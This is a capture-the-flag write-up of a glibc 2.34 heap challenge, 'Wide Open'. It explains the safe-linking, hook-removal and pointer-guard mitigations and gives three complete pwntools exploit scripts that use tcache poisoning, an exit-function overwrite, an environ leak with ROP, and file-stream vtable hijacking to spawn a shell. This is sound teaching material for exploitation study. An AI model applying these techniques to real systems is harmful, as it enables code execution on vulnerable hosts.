
Wide Open

In BlueHens CTF 2022, 497 points

Full Green Heap 2.34, how many ways can you find?

nc 0.cloud.chals.io 10605

Challenge files: pwnme (1) ld-linux-x86-64.so.2

This challenge is a fairly standard heap challenge. The binary provides the standard four functions:

  • Allocate an arbitrarily sized chunk (the binary claims that up to 100 chunks can be allocated, but this is never checked)
  • Free a previously allocated chunk. The pointer to the chunk is not zeroed, so we have UAF/double free here.
  • Edit a previously allocated chunk. We can edit the metadata of a freed chunk to achieve arbitrary read/write.
  • View the contents of a previously allocated chunk. We can use this to leak libc (via unsorted bin pointers) and heap (via tcache pointers)

Seems fairly standard, right? I've written writeups about these kinds of heap challenges here. The twist here is the challenge runs glibc 2.34, which includes several mitigations that make the techniques detailed in the previous writeup impossible.

Thus, this writeup will explore the mitigations introduced after glibc 2.31 and several methods to bypass them.

Safe linking

In regular tcache poisoning, we can freely overwrite tcache pointers to achieve arbitrary read/write. In glibc 2.32, safe linking was introduced to "encrypt" the pointers in the tcache and fastbins to make it more difficult to manipulate these pointers. The code for encrypting the pointer can be found here:

c
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)

pos is the address where the pointer will be stored, and ptr is the pointer. Essentially the pointer is XORed with the page number of the page it is stored in. Since most of the pointers we are concerned about will be stored in the heap, we just need to leak the page number of one of the chunks in the heap. This is easy as we can just leak the (encrypted) tcache pointers and do some math to recover the original pointer:

py
def deobfuscate(val):
    mask = 0xfff << 52
    while mask:
        v = val & mask
        val ^= (v >> 12)
        mask >>= 12
    return val

(Code from here)

Once we have obtained the original pointer, we can just XOR it with the encrypted value to recover the key.
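As a minimal sketch of that round trip, the snippet below protects a pointer, recovers it with deobfuscate, and derives the key. The two addresses are made up for illustration and are assumed to lie in the same 4 KiB heap page, which is the case the deobfuscation relies on; protect_ptr is a Python restatement of PROTECT_PTR.

```python
def protect_ptr(pos, ptr):
    # Python restatement of PROTECT_PTR: XOR with the page number of the slot
    return (pos >> 12) ^ ptr

def deobfuscate(val):
    # Same routine as above: repair 12 bits at a time, from the top down
    mask = 0xfff << 52
    while mask:
        v = val & mask
        val ^= v >> 12
        mask >>= 12
    return val

pos = 0x55d3c0a012a0   # hypothetical address of the freed chunk's next field
nxt = 0x55d3c0a012c0   # hypothetical next free chunk, same page as pos

stored = protect_ptr(pos, nxt)     # what the view function would leak
recovered = deobfuscate(stored)    # original pointer
key = recovered ^ stored           # equals pos >> 12
```

When the leaked chunk is the last entry in its bin, its next pointer is NULL and the stored value is simply pos >> 12, which is why the second solve script can recover the heap page with leak << 12.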

Removal of hooks

Glibc 2.34 removed __malloc_hook and __free_hook, two important hooks that allowed us to obtain $rip control with a single arbitrary write.

There are actually multiple approaches to bypass this protection. I will discuss the method I used, as well as two other methods I have seen in others' solve scripts:

  • The method I used: writing to exit_function_list (based on here with tweaks)
  • The method used by Triacontakai of ViewSource: leak stack + ROP
  • The method used by the challenge author: File stream oriented programming

Exit function list

Note: this technique is heavily based on this writeup

Similarly to __malloc_hook, the __exit_funcs variable in glibc contains information about what functions to call when a certain operation occurs, in this case on program exit.

The __exit_funcs variable points to an exit_function_list struct, which in turn contains exit_function entries.

c
struct exit_function
  {
    /* `flavour' should be of type of the `enum' above but since we need
       this element in an atomic operation we have to use `long int'.  */
    long int flavor;
    union
      {
    void (*at) (void);
    struct
      {
        void (*fn) (int status, void *arg);
        void *arg;
      } on;
    struct
      {
        void (*fn) (void *arg, int status);
        void *arg;
        void *dso_handle;
      } cxa;
      } func;
  };

There are three different types of exit_function (at, on and cxa). Since our goal is to call system("/bin/sh"), the cxa variant seems most applicable as the first argument is a pointer. The 'flavor' is represented by the number 4.
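The layout that needs to be forged can be sketched with Python's struct module. This assumes the x86-64 layout of struct exit_function_list (a next pointer, an idx count, then the fns array) and the flavor enum order ef_free, ef_us, ef_on, ef_at, ef_cxa from glibc's exit.h. The helper name forge_exit_list and the example values are hypothetical.

```python
import struct

EF_CXA = 4  # position of ef_cxa in glibc's flavor enum

def forge_exit_list(mangled_fn, arg):
    """Pack an exit_function_list holding a single cxa entry (little-endian)."""
    return struct.pack(
        "<6Q",
        0,           # next: no further list
        1,           # idx: one registered function
        EF_CXA,      # fns[0].flavor
        mangled_fn,  # fns[0].func.cxa.fn (must already be pointer-mangled)
        arg,         # fns[0].func.cxa.arg, passed as the first argument
        0,           # fns[0].func.cxa.dso_handle
    )

# Placeholder values, only to show the resulting layout
blob = forge_exit_list(0x4141414141414141, 0x4242424242424242)
```

The six quadwords correspond to the p64(0) + p64(1) + p64(4) + ... payload used in my solve script further down.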

Fortunately, the default exit_function_list is at a constant offset in libc, so we can simply allocate a chunk there and overwrite the fn pointer, right?

(Un)fortunately, glibc has implemented an additional protection: pointer guard. This sounds similar to the safe linking mechanism but relies on a secret key instead of the memory location of the pointer to be encrypted.

This is implemented here, and the linked writeup reimplements it in Python as:

py
# The shifts are copied from the above blogpost
# Rotate left: 0b1001 --> 0b0011
rol = lambda val, r_bits, max_bits: \
    (val << r_bits%max_bits) & (2**max_bits-1) | \
    ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))

# encrypt a function pointer
def encrypt(v, key):
    return p64(rol(v ^ key, 0x11, 64))
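For reference, the inverse operation is a rotate right followed by the XOR. The sketch below is pure Python (no pwntools) and uses a made-up guard value and address; mangle and demangle are names chosen here to mirror glibc's PTR_MANGLE and PTR_DEMANGLE on x86-64.

```python
MASK64 = (1 << 64) - 1

def rol64(v, r):
    r %= 64
    return ((v << r) | (v >> (64 - r))) & MASK64

def ror64(v, r):
    r %= 64
    return ((v >> r) | (v << (64 - r))) & MASK64

def mangle(ptr, guard):
    # XOR with the pointer guard, then rotate left by 0x11 bits
    return rol64(ptr ^ guard, 0x11)

def demangle(val, guard):
    # Undo the rotation, then undo the XOR
    return ror64(val, 0x11) ^ guard

guard = 0x1122334455667788   # hypothetical pointer guard
ptr = 0x00007f0000050d60     # hypothetical function address
roundtrip = demangle(mangle(ptr, guard), guard)
```

With a guard of zero, mangling reduces to the rotation alone.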

The key is actually stored in memory in the thread control block (TCB), the same place that stack canaries are stored:

c
typedef struct
{
  void *tcb;		/* Pointer to the TCB.  Not necessarily the
			   thread descriptor used by libpthread.  */
  dtv_t *dtv;
  void *self;		/* Pointer to the thread descriptor.  */
  int multiple_threads;
  int gscope_flag;
  uintptr_t sysinfo;
  uintptr_t stack_guard;
  uintptr_t pointer_guard;   // <------ this is the field we are interested in
  unsigned long int unused_vgetcpu_cache[2];
  /* Bit 0: X86_FEATURE_1_IBT.
     Bit 1: X86_FEATURE_1_SHSTK.
   */
  unsigned int feature_1;
  int __glibc_unused1;
  /* Reservation of some values for the TM ABI.  */
  void *__private_tm[4];
  /* GCC split stack support.  */
  void *__private_ss;
  /* The lowest address of shadow stack,  */
  unsigned long long int ssp_base;
  /* Must be kept even if it is no longer used by glibc since programs,
     like AddressSanitizer, depend on the size of tcbhead_t.  */
  __128bits __glibc_unused2[8][4] __attribute__ ((aligned (32)));

  void *__padding[8];
} tcbhead_t;
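The offset of pointer_guard inside this struct can be double-checked with a short ctypes sketch. Only the leading fields are modelled, pointers are represented as 64-bit integers (an x86-64 assumption), and the class and field names are my own.

```python
import ctypes

class TcbHead(ctypes.Structure):
    # Leading fields of tcbhead_t on x86-64; pointers modelled as 64-bit ints
    _fields_ = [
        ("tcb", ctypes.c_uint64),
        ("dtv", ctypes.c_uint64),
        ("self_ptr", ctypes.c_uint64),
        ("multiple_threads", ctypes.c_int32),
        ("gscope_flag", ctypes.c_int32),
        ("sysinfo", ctypes.c_uint64),
        ("stack_guard", ctypes.c_uint64),
        ("pointer_guard", ctypes.c_uint64),
    ]

stack_guard_off = TcbHead.stack_guard.offset
pointer_guard_off = TcbHead.pointer_guard.offset
print(hex(stack_guard_off), hex(pointer_guard_off))  # prints: 0x28 0x30
```

This is why the stack canary is read from fs:0x28 and the pointer guard from fs:0x30.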

After some searching with GDB, I found the offset of the TCB from the libc address.

From here, I used the previously established arbitrary write primitive to zero out the pointer_guard. Fortunately, the address was 16 byte aligned so there was no problem allocating a chunk there.
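The alignment matters because, since glibc 2.32, tcache_get aborts when the chunk it is about to return is not 16-byte aligned. A small helper along these lines can catch a bad target before it is sent; poisoned_next is a hypothetical name and the addresses are placeholders.

```python
def poisoned_next(target, freed_chunk_addr):
    """Value to write into a freed tcache chunk so that malloc later returns target."""
    if target % 16:
        # glibc would abort with an unaligned tcache chunk error
        raise ValueError(f"target {target:#x} is not 16-byte aligned")
    # Safe linking: XOR with the page number of the chunk holding the pointer
    return target ^ (freed_chunk_addr >> 12)

# Placeholder addresses for illustration
fd = poisoned_next(0x7f1234567770, 0x55555555a2c0)
```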

With the pointer guard key zeroed out, we just need to rotate the address of system left by 0x11 bits to pass the pointer mangling. Now, we can write this 'mangled' address to the fn field of the exit_function struct and set arg to a pointer to /bin/sh (a chunk I allocated on the heap). Thus, system("/bin/sh") is called when the program exits.

This requires two writes, which is somewhat more complicated than traditional heap UAF pwn. The original writeup instead recovers the key by leaking the obfuscated fn value, which is known to correspond to _dl_fini. In this case, however, the address of fn was not 16-byte aligned, so we cannot allocate a chunk at that address. Allocating a chunk 8 bytes before the desired address and filling those 8 bytes with padding does not work either, as fgets appends a null terminator to the written string. If read were used instead, this technique would be feasible and would require only one fake chunk.
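For completeness, the key recovery used by the original writeup can be sketched as follows. It was not usable in this challenge for the reasons above, and the guard and _dl_fini values are made up; recover_guard is a hypothetical helper name.

```python
MASK64 = (1 << 64) - 1

def rol64(v, r):
    r %= 64
    return ((v << r) | (v >> (64 - r))) & MASK64

def ror64(v, r):
    r %= 64
    return ((v >> r) | (v << (64 - r))) & MASK64

def recover_guard(mangled, known_ptr):
    # mangled = rol64(known_ptr ^ guard, 0x11), so undo the rotation and XOR
    return ror64(mangled, 0x11) ^ known_ptr

# Simulate the leak with placeholder values
guard = 0xdeadbeefcafef00d
dl_fini = 0x00007f00001c9040
leaked_fn = rol64(dl_fini ^ guard, 0x11)
recovered = recover_guard(leaked_fn, dl_fini)
```

With the guard known, a single write of rol64(system ^ guard, 0x11) into fn would be enough.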

py
from pwn import *

e = ELF("./chal")
libc = ELF("libc.so.6", checksec=False)
ld = ELF("ld-linux-x86-64.so.2", checksec=False)
context.binary = e

def setup():
    p = e.process()
    return p

def alloc(p, i, size, s):
    p.recvuntil(">")
    p.sendline("1")
    p.recvuntil("index")
    p.sendline(str(i))
    p.recvuntil("big")
    p.sendline(str(size))
    p.recvuntil("payload")
    p.sendline(s)
def edit(p, i, s):
    p.recvuntil(">")
    p.sendline("3")
    p.recvuntil("index")
    p.sendline(str(i))
    p.recvuntil("contents")
    p.sendline(s)
def free(p,i):
    p.recvuntil(">")
    p.sendline("2")
    p.recvuntil("index")
    p.sendline(str(i))
def view(p,i):
    p.recvuntil(">")
    p.sendline("4")
    p.recvuntil("index")
    p.sendline(str(i))
    (p.recvline())
    return p.recvline(keepends=False)[2:]


def defu(p):
    d = 0
    for i in range(0x100,0,-4):
      pa = (p & (0xf << i )) >> i
      pb = (d & (0xf << i+12 )) >> i+12
      d |= (pa ^ pb) << i
    return d

def obfuscate(p, adr):
    return p^(adr>>12)

rol = lambda val, r_bits, max_bits: \
    (val << r_bits%max_bits) & (2**max_bits-1) | \
    ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))

if __name__ == '__main__':
    p = setup()


    for i in range(2):
        alloc(p, i, 30, str(i))

    for i in range(2,4):
        alloc(p, i, 100, str(i))
    alloc(p, 5, 0x1000, b"unsort")
    alloc(p, 6, 100, b"buffer")
    alloc(p, 7, 100, b"/bin/sh")
    for i in range(6):
       free(p, i)
    l = view(p,1)
    l = defu(u64(l+b"\0\0"))

    libc_leak = u64(view(p, 5)+b"\0\0")
    libc.address = libc_leak - 0x1f2cc0
    print(hex(libc.address))


    # First write: zero out the pointer guard stored at fs:0x30
    target_heap_addr = l + 30
    # Address of the pointer guard (fs:0x30), found with GDB
    target_addr = libc.address - 0x2890
    edit(p, 1, p64(obfuscate(target_addr, target_heap_addr)))

    alloc(p, 0, 30, b"aa")
    # This allocation lands on fs:0x30 and zeroes the pointer guard
    alloc(p, 0, 30, b"\0"*20)

    # Second write
    target_heap_addr2 = l + 0xd0
    target_addr2 = libc.address + 0x1f4bc0
    edit(p, 3, p64(obfuscate(target_addr2, target_heap_addr2)))
    alloc(p, 0, 100, b"aa")
    bin_sh = l + 0x11c0
    onexit_fun = p64(0) + p64(1) + p64(4) +p64(rol(libc.sym.system, 0x11, 64)) + p64(bin_sh) + p64(0)
    alloc(p, 0, 100, onexit_fun)

    # exit
    p.sendline("5")
    p.sendline("id")

    p.interactive()

Stack leak + ROP

This technique was used by Triacontakai in https://discord.com/channels/820012263845920768/823257424088924201/1036404972130152478.

This is perhaps the simplest of the methods detailed here, but also requires two fake chunks.

First, the glibc environ symbol is leaked. This variable holds a stack address: the value of main's third argument, char **envp, which points to the environment array on the stack.

This is actually nontrivial. The author allocates chunks of data size 24 bytes, which produces chunks of size 0x20. This is the smallest possible glibc heap chunk size.

Next, the author performs the typical tcache poisoning attack. However, instead of allocating chunks of size 24, the author allocates chunks of data size 0. As 0x20 is the smallest chunk size, malloc(0) returns chunks from the 0x20 size tcache. However, 0 is also the size passed to fgets, so no data is written to the target environ chunk, not even the null byte, allowing its value to be read subsequently.
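The size arithmetic behind this can be sketched as follows, assuming the usual x86-64 constants (8 bytes of size-field overhead, 16-byte alignment, 0x20 minimum chunk size). request2size here is a Python restatement of the glibc macro of the same name.

```python
SIZE_SZ = 8        # size of the chunk size field on x86-64
ALIGN_MASK = 0xf   # chunks are 16-byte aligned
MINSIZE = 0x20     # smallest possible chunk

def request2size(req):
    """Chunk size that malloc(req) ends up using."""
    padded = req + SIZE_SZ + ALIGN_MASK
    return MINSIZE if padded < MINSIZE else padded & ~ALIGN_MASK

sizes = {req: hex(request2size(req)) for req in (0, 24, 25, 0x40 - 8)}
print(sizes)  # {0: '0x20', 24: '0x20', 25: '0x30', 56: '0x40'}
```

Both malloc(0) and malloc(24) are served from the 0x20 tcache bin, which is what lets the poisoned entry be taken out without writing to it.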

Once the environ is leaked, the author calculates a target chunk so that when malloc is called in menu_malloc, it returns a pointer to the saved rip of the function. This allows the author to write their ROP 'ret2libc' payload, while bypassing the stack guard completely.
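A rough sketch of that calculation is shown below. The 336-byte distance and the 8 bytes of padding are taken from the solve script and are specific to this binary; my reading is that the fake chunk starts 8 bytes below the saved return address, presumably to keep it 16-byte aligned. The function name and all addresses are placeholders.

```python
import struct

def ret2libc_chunk(environ_leak, pop_rdi, binsh, system, ret_offset=336, pad=8):
    """Return (fake chunk address, payload) for a write over the saved return address."""
    chunk_addr = environ_leak - (ret_offset + pad)
    payload = b"A" * pad                                  # bytes just below the return address
    payload += struct.pack("<3Q", pop_rdi, binsh, system) # pop rdi; ret -> "/bin/sh" -> system
    return chunk_addr, payload

# Placeholder addresses for illustration only
chunk_addr, payload = ret2libc_chunk(
    environ_leak=0x7ffc00001238,
    pop_rdi=0x7f000002daa2,
    binsh=0x7f00001b0000,
    system=0x7f0000050000,
)
```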

Their solve script is reproduced below:

py
import re
import sys
from pwn import *

path = './pwnme'
host = '0.cloud.chals.io'
port = 10605

libc = ELF('./libc.so.6')

if len(sys.argv) > 1:
    p = gdb.debug(path, '''
        c
    ''', api=True, aslr=True)
else:
    p = remote(host, port)

def b():
    p.gdb.interrupt_and_wait()
    input("press any key to resume")
def numb(num):
    return str(num).encode('ascii')

def alloc(idx, size, data):
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'> ', numb(idx))
    p.sendlineafter(b'> ', numb(size))
    p.sendlineafter(b'> ', data)

def delete(idx):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b'> ', numb(idx))

def edit(idx, data):
    p.sendlineafter(b'> ', b'3')
    p.sendlineafter(b'> ', numb(idx))
    p.sendlineafter(b'> ', data)

def view(idx):
    p.sendlineafter(b'> ', b'4')
    p.sendlineafter(b'> ', numb(idx))
    return p.recvuntil(b'You are', drop=True)

# allocate unsorted bin chunk for libc leak
alloc(0, 0x420, b'AAAAAAAA')

# allocate tcache size chunk for heap leak
# this also prevents unsorted bin chunk from coalescing on free
alloc(1, 24, b'BBBBBBBB')

# allocate another 0x20 size chunk for poisoning later
alloc(2, 24, b'CCCCCCCC')

# free 0x20 size chunks into tcache
# looks like this:
# [2] -> [1]
delete(1)
delete(2)

# free unsorted bin size chunk to put libc address
delete(0)

# get heap leak
leak = u64(view(1)[:-1].ljust(8, b'\x00'))
heap = leak << 12
log.info(f"heap base: 0x{heap:x}")

# get libc leak
leak = u64(view(0)[:-1].ljust(8, b'\x00'))
libc.address = leak - (0x7f1d52750cc0 - 0x7f1d5255e000)
log.info(f"libc base: 0x{libc.address:x}")

# do tcache poisoning
mask = heap >> 12
edit(2, p64(mask ^ libc.symbols['environ']))

# allocate two chunks
# second chunk will be environ chunk
alloc(2, 0, b'')
alloc(2, 0, b'')

# get stack leak
stack = u64(view(2)[:-1].ljust(8, b'\x00'))
log.info(f"stack leak: 0x{stack:x}")

# offset stack leak to return address location
stack -= 336 + 8

# do poisoning again to get write on stack woohoo im having so much fun
alloc(1, 0x40-8, b'')
alloc(2, 0x40-8, b'')
delete(1)
delete(2)
edit(2, p64(mask ^ stack))

pop_rdi = libc.address + 0x000000000002daa2
binsh = next(libc.search(b'/bin/sh\x00'))

payload = b'A' * 8
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(libc.symbols['system'])

alloc(2, 0x40-8, b'')
alloc(2, 0x40-8, payload)

p.interactive()

File stream oriented programming

This is the technique used by the challenge author. In my opinion, it is far more complicated than the other two techniques.

It still requires two fake chunks, and requires editing one of the chunks twice. The chunk sizes allocated are also quite large. After so much trouble, I'm not sure what the advantages of this method are over the others.

Anyway, I've done some FSOP here, but this is significantly more complex.

To summarize, each file stream (like stdout) has an _IO_FILE_plus struct which contains a _IO_FILE and a pointer to a vtable. By manipulating the function pointers in the vtable, we can control RIP. The attack then pops a shell via a one gadget.

This method is similar to that, except the one gadgets we have in this libc have fairly strict conditions, and I couldn't find a function pointer that I could overwrite with a one gadget that would work.

The challenge author uses _IO_OVERFLOW, which is called by _IO_flush_all_lockp on process exit as part of the cleanup process.

Unfortunately, _IO_flush_all_lockp will be called whenever file streams are flushed, which as it turns out is quite a lot.

However, _IO_OVERFLOW is only called if specific conditions are met:

c
if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
     || (_IO_vtable_offset (fp) == 0
         && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
                              > fp->_wide_data->_IO_write_base))
    )
    && _IO_OVERFLOW (fp, EOF) == EOF)

_IO_OVERFLOW will only be called if either of the first two conditions in the if statement is true.

To start, the author allocates a large fake chunk over _IO_2_1_stdout_. Using this fake chunk, they modify fp->_mode to be greater than 0, and fp->_IO_write_ptr to be greater than fp->_IO_write_base.

The first condition now fails because fp->_mode > 0, and the second condition does not hold either, as fp->_wide_data->_IO_write_ptr == fp->_wide_data->_IO_write_base == 0.

Thus, by setting fp->_mode > 0, premature execution of _IO_OVERFLOW is prevented. Unfortunately, this also causes output to be disabled.
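The guard condition can be modelled as a small Python predicate to see why the two settings of _mode behave differently. This only mirrors the if statement quoted above; the function and parameter names are my own, and the pointer values are arbitrary.

```python
def overflow_would_run(mode, write_ptr, write_base,
                       wide_write_ptr=0, wide_write_base=0, vtable_offset=0):
    """Mirror of the condition guarding _IO_OVERFLOW in the quoted snippet."""
    narrow = mode <= 0 and write_ptr > write_base
    wide = vtable_offset == 0 and mode > 0 and wide_write_ptr > wide_write_base
    return narrow or wide

# First edit: _mode = 2, write_ptr > write_base, wide pointers both 0
during_setup = overflow_would_run(mode=2, write_ptr=0x1001, write_base=0x1000)

# Final edit: _mode = -1 with the same write pointers
at_exit = overflow_would_run(mode=-1, write_ptr=0x1001, write_base=0x1000)
```

Here during_setup is False and at_exit is True, matching the two stages of the exploit.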

Next, the author allocates another large chunk on __GI__IO_file_jumps, the file vtable. The author modifies the __overflow field to the one gadget address. However, since the first argument of _IO_OVERFLOW is the file pointer, which we have write access to, I decided to use system, instead of a one gadget.

Once the vtable is manipulated, I modified the _IO_2_1_stdout_ object again to set the _flags field to /bin/sh. Since _flags is at the start of the file object, when _IO_OVERFLOW is called, _flags will be the string that is passed to system. We could not do this beforehand as messing up the file flags would cause a crash. The fp->_mode field is set to -1 so that the checks can pass and allow _IO_OVERFLOW to be called.

Now, all that's left is to command the process to exit and system(_IO_2_1_stdout_) will be called, which is equivalent to system("/bin/sh").
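The final edit only needs to touch two fields, which can be sketched on a byte buffer. The offsets are assumptions based on the x86-64 glibc FILE layout (_flags at 0x0, _mode at 0xc0); they agree with the solve script, where 0xc0 bytes precede the p32 mode value. The helper name and the zero-filled body are placeholders.

```python
import struct

MODE_OFFSET = 0xc0  # assumed offset of _mode in FILE on x86-64

def set_flags_and_mode(file_bytes, flags8, mode):
    """Overwrite the first 8 bytes (_flags plus padding) and the _mode field."""
    if len(flags8) != 8:
        raise ValueError("flags8 must be exactly 8 bytes")
    buf = bytearray(file_bytes)
    buf[0:8] = flags8
    buf[MODE_OFFSET:MODE_OFFSET + 4] = struct.pack("<i", mode)
    return bytes(buf)

# Stand-in for the first write: real flags, zeroed body, _mode = 2
first_write = struct.pack("<Q", 0xfbad2887) + bytes(0xb8) + struct.pack("<i", 2)

# Second write: "/bin/sh" in place of _flags, _mode = -1
final_write = set_flags_and_mode(first_write, b"/bin/sh\0", -1)
```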

Modified solve script:

py
from pwn import *
from time import sleep
import re


p=process("./chal")
libc = ELF("./libc.so.6")
elf=ELF("./chal")

def malloc(ind, size, payload):
    global p
    r1 = p.sendlineafter(b">", "1")
    r2 = p.sendlineafter(b">", str(ind))
    r3 = p.sendlineafter(b">", str(size))
    r4 = p.sendlineafter(b">",payload)
    return r1+r2+r3+r4

def malloc_no_out(ind, size, payload):
    global p
    sleep(1)
    p.sendline("1")
    sleep(1)
    p.sendline(str(ind))
    sleep(1)
    p.sendline(str(size))
    sleep(1)
    p.sendline(payload)

def free(ind):
    global p
    r1 = p.sendlineafter(b">", "2")
    r2 = p.sendlineafter(b">", str(ind))
    return r1 + r2

def free_no_out(ind):
    global p
    sleep(1)
    p.sendline("2")
    sleep(1)
    p.sendline(str(ind))
    sleep(1)

def edit(ind, payload):
    global p
    r1 = p.sendlineafter(b">","3")
    r2 = p.sendlineafter(b">",str(ind))
    r3 = p.sendlineafter(b">",payload)
    return r1+r2+r3

def edit_no_out(ind, payload):
    global p
    sleep(1)
    p.sendline("3")
    sleep(1)
    p.sendline(str(ind))
    sleep(1)
    p.sendline(payload)

def view(ind):
    global p
    r1 = p.sendlineafter(b">", "4")
    r2 = p.sendlineafter(b">", str(ind))
    leak = p.recvuntil(b"addresses.");
    return leak

def raw2leak(resp):
    leakr=resp[1:].split(b"\n")[0]
    return u64(leakr.ljust(8, b'\x00'))

def decrypt(leak):
    key=0
    res=0
    for i in range(1,6):
        bits=64-12*i
        if bits < 0:
            bits = 0
        res = ((leak ^ key) >> bits) << bits
        key = res >> 12
    return res

#GOAL 0: make a glibc leak by creating an unsorted size then a buffer chunk and freeing the big one:
print(malloc(50, 0x420, "hi there"))
print(malloc(51, 24, "smol"))
print(free(50))
raw = view(50)
leakr=raw[1:].split(b"\n")[0]
glibcleak = u64(leakr.ljust(8, b'\x00'))
libc.address = glibcleak - (libc.sym.main_arena+96)
one_gadget = 0xda811 + libc.address
filler = libc.sym._IO_2_1_stdout_ - 131
stdout_FILE = (p64(filler)*4
        + p64(filler + 1)*2
        + p64(filler)
        + p64(filler + 1)
        + p64(0)*4
        + p64(libc.sym._IO_2_1_stdin_)
        + p64(1)
        + p64(0xffffffffffffffff)
        + p64(0x0)
        + p64(libc.sym._IO_stdfile_1_lock)
        + p64(0xffffffffffffffff)
        + p64(0)
        + p64(libc.sym._IO_wide_data_1)
        + p64(0x0)*3 )



#OK targeting _IO_2_1_stdout_ -16 or -32

malloc(0, 0x368, "chunk0")
malloc(1, 0x368, "chunk1")
malloc(2, 0x378, "chunk2")
malloc(3, 0x378, "chunk3")
malloc(4, 24, "smol2")
free(0)
free(1)
free(2)
free(3)
print("commencing heap leak")
heapleap = decrypt(raw2leak(view(1)))
heapleap = (heapleap >> 12) << 12
print(hex(heapleap))
print("target stdout", hex(libc.sym._IO_2_1_stdout_))
print("target file jumps", hex(libc.sym.__GI__IO_file_jumps))
edit(1, p64( (libc.sym._IO_2_1_stdout_) ^ (heapleap >> 12)) + p64(heapleap) )
edit_no_out(3, p64( (libc.sym.__GI__IO_file_jumps) ^ (heapleap >> 12)) + p64(heapleap) )

malloc(5, 0x368, "junk")
malloc(6, 0x378, "junk2")
print("wait for it...")

malloc(7, 0x368, p64(0xfbad2887) + stdout_FILE + p32(2) + p32(0) )

gi_jump = (p64(0)*2 +
        p64(libc.sym._IO_new_file_finish)+
        p64(libc.sym.system)+#p64(libc.sym._IO_new_file_overflow)+
        p64(libc.sym._IO_new_file_underflow)+
        p64(libc.sym.__GI__IO_default_uflow)+
        p64(libc.sym.__GI__IO_default_pbackfail)+
        p64(libc.sym._IO_new_file_xsputn)+
        p64(libc.sym.__GI__IO_file_xsgetn)+
        p64(libc.sym._IO_new_file_seekoff)+
        p64(libc.sym._IO_default_seekpos)+
        p64(libc.sym._IO_new_file_setbuf)+
        p64(libc.sym._IO_new_file_sync)+
        p64(libc.sym.__GI__IO_file_doallocate)+
        p64(libc.sym.__GI__IO_file_read)+
        p64(libc.sym._IO_new_file_write)+
        p64(libc.sym.__GI__IO_file_seek)+

        p64(libc.sym.__GI__IO_file_close)+
        p64(libc.sym.__GI__IO_file_stat)+
        p64(libc.sym._IO_default_showmanyc)+
        p64(libc.sym._IO_default_imbue))
malloc_no_out(8, 0x378, gi_jump)

edit_no_out(7, b"/bin/sh\0" + stdout_FILE+p32(0xffffffff))
print("ready")
p.sendline("5")
p.interactive()